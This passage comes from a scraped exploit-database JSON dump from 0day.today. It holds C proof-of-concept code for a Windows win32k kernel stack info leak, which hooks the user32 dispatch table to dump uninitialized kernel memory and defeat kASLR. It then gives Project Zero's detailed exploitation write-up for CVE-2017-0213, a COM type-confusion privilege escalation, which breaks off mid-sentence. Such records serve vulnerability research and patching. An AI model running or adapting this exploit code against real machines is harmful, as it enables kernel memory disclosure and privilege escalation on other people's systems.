prologue of win32k!DrawTextExWorker, which illustrates how uninitialized stack data is leaked to user-mode.\r\n \r\nRepeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.\r\n*/\r\n \r\n#include <Windows.h>\r\n#include <cstdio>\r\n \r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n \r\n printf(\"\\n\");\r\n }\r\n}\r\n \r\nPVOID *GetUser32DispatchTable() {\r\n __asm{\r\n mov eax, fs:30h\r\n mov eax, [eax+0x2c]\r\n }\r\n}\r\n \r\nBOOL HookUser32DispatchFunction(UINT Index, PVOID lpNewHandler) {\r\n PVOID *DispatchTable = GetUser32DispatchTable();\r\n DWORD OldProtect;\r\n \r\n if (!VirtualProtect(DispatchTable, 0x1000, PAGE_READWRITE, &OldProtect)) {\r\n printf(\"VirtualProtect#1 failed, %d\\n\", GetLastError());\r\n return FALSE;\r\n }\r\n \r\n DispatchTable[Index] = lpNewHandler;\r\n \r\n if (!VirtualProtect(DispatchTable, 0x1000, OldProtect, &OldProtect)) {\r\n printf(\"VirtualProtect#2 failed, %d\\n\", GetLastError());\r\n return FALSE;\r\n }\r\n \r\n return TRUE;\r\n}\r\n \r\nVOID ClientLpkDrawTextExHook(LPVOID Data) {\r\n printf(\"----------\\n\");\r\n PrintHex((PBYTE)Data, 0x98);\r\n}\r\n \r\nint main() {\r\n if (!HookUser32DispatchFunction(69, ClientLpkDrawTextExHook)) {\r\n return 1;\r\n }\r\n \r\n HWND hwnd = CreateWindowW(L\"BUTTON\", L\"TestWindow\", WS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n CW_USEDEFAULT, CW_USEDEFAULT, 100, 100, NULL, NULL, 0, 0);\r\n DestroyWindow(hwnd);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/27775", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-02-21T15:35:29", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27798", "href": "https://0day.today/exploit/description/27798", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107\r\n \r\nWindows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nWhen accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.\r\n \r\nDescription:\r\n \r\nQuerying for an IID on a OOP (or remote) COM object calls the ORPC method RemQueryInterface or RemQueryInterface2 on the default proxy. This request is passed to the remote object which queries the implementation object and if successful returns a marshaled representation of that interface to the caller. \r\n \r\nThe difference between RemQueryInterface and RemQueryInterface2 (RQI2) is how the objects are passed back to the caller. For RemQueryInterface the interface is passed back as a STDOBJREF which only contains the basic OXID/OID/IPID information to connect back. RemQueryInterface2 on the other hand passes back MInterfacePointer structures which is an entire OBJREF. The rationale, as far as I can tell, is that RQI2 is used for implementing in-process handlers, some interfaces can be marshaled using the standard marshaler and others can be custom marshaled. This is exposed through the Aggregate Standard Marshaler. \r\n \r\nThe bug lies in the implementation of unpacking the results of the the RQI2 request in CStdMarshal::Finish_RemQIAndUnmarshal2. For each MInterfacePointer CStdMarshal::UnmarshalInterface is called passing the IID of the expected interface and the binary data wrapped in an IStream. CStdMarshal::UnmarshalInterface blindly unmarshals the interface, which creates a local proxy object but the proxy is created for the IID in the OBJREF stream and NOT the IID requested in RQI2. No further verification occurs at this point and the created proxy is passed back up the call stack until the received by the caller (through a void** obviously). \r\n \r\nIf the IID in the OBJREF doesn\u2019t match the IID requested the caller doesn\u2019t know, if it calls any methods on the expected interface it will be calling a type confused object. This could result in crashes in the caller when it tries to access methods on the expected interface which aren\u2019t there or are implemented differently. You could probably also return a standard OBJREF to a object local to the caller, this will result in returning the local object itself which might have more scope for exploiting the type confusion. In order to get the caller to use RQI2 we just need to pass it back an object which is custom marshaled with the Aggregate Standard Marshaler. This will set a flag on the marshaler which indicates to always use the aggregate marshaler which results in using RQI2 instead of RQI. As this class is a core component of COM it\u2019s trusted and so isn\u2019t affected by the EOAC_NO_CUSTOM_MARSHAL setting.\r\n \r\nIn order to exploit this a different caller needs to call QueryInterface on an object under a less trusted user's control. This could be a more privileged user (such as a sandbox broker), or a privileged service. This is pretty easy pattern to find, any method in an exposed interface on a more trusted COM object which takes an interface pointer or variant would potentially be vulnerable. For example IPersistStream takes an IStream interface pointer and will call methods on it. Another type of method is one of the various notification interfaces such as IBackgroundCopyCallback for BITS. This can probably also be used remotely if the attacker has the opportunity to inject an OBJREF stream into a connection which is set to CONNECT level security (which seems to be the default activation security). \r\n \r\nOn to exploitation, as you well know I\u2019ve little interest in exploiting memory corruptions, especially as this would either this will trigger CFG on modern systems or would require a very precise lineup of expected method and actual called method which could be tricky to exploit reliably. However I think at least using this to escape a sandbox it might be your only option. So I\u2019m not going to do that, instead I\u2019m going to exploit it logically, the only problem is this is probably unexploitable from a sandbox (maybe) and requires a very specific type of callback into our object. \r\n \r\nThe thing I\u2019m going to exploit is in the handling of OLE Automation auto-proxy creation from type libraries. When you implement an Automation compatible object you could implement an explicit proxy but if you\u2019ve already got a Type library built from your IDL then OLEAUT32 provides an alternative. If you register your interface with a Proxy CLSID for PSOAInterface or PSDispatch then instead of loading your PS DLL it will load OLEAUT32. The proxy loader code will lookup the interface entry for the passed IID to see if there\u2019s a registered type library associated with it. If there is the code will call LoadTypeLib on that library and look up the interface entry in the type library. It will then construct a custom proxy object based on the type library information. \r\n \r\nThe trick here is while in general we don\u2019t control the location of the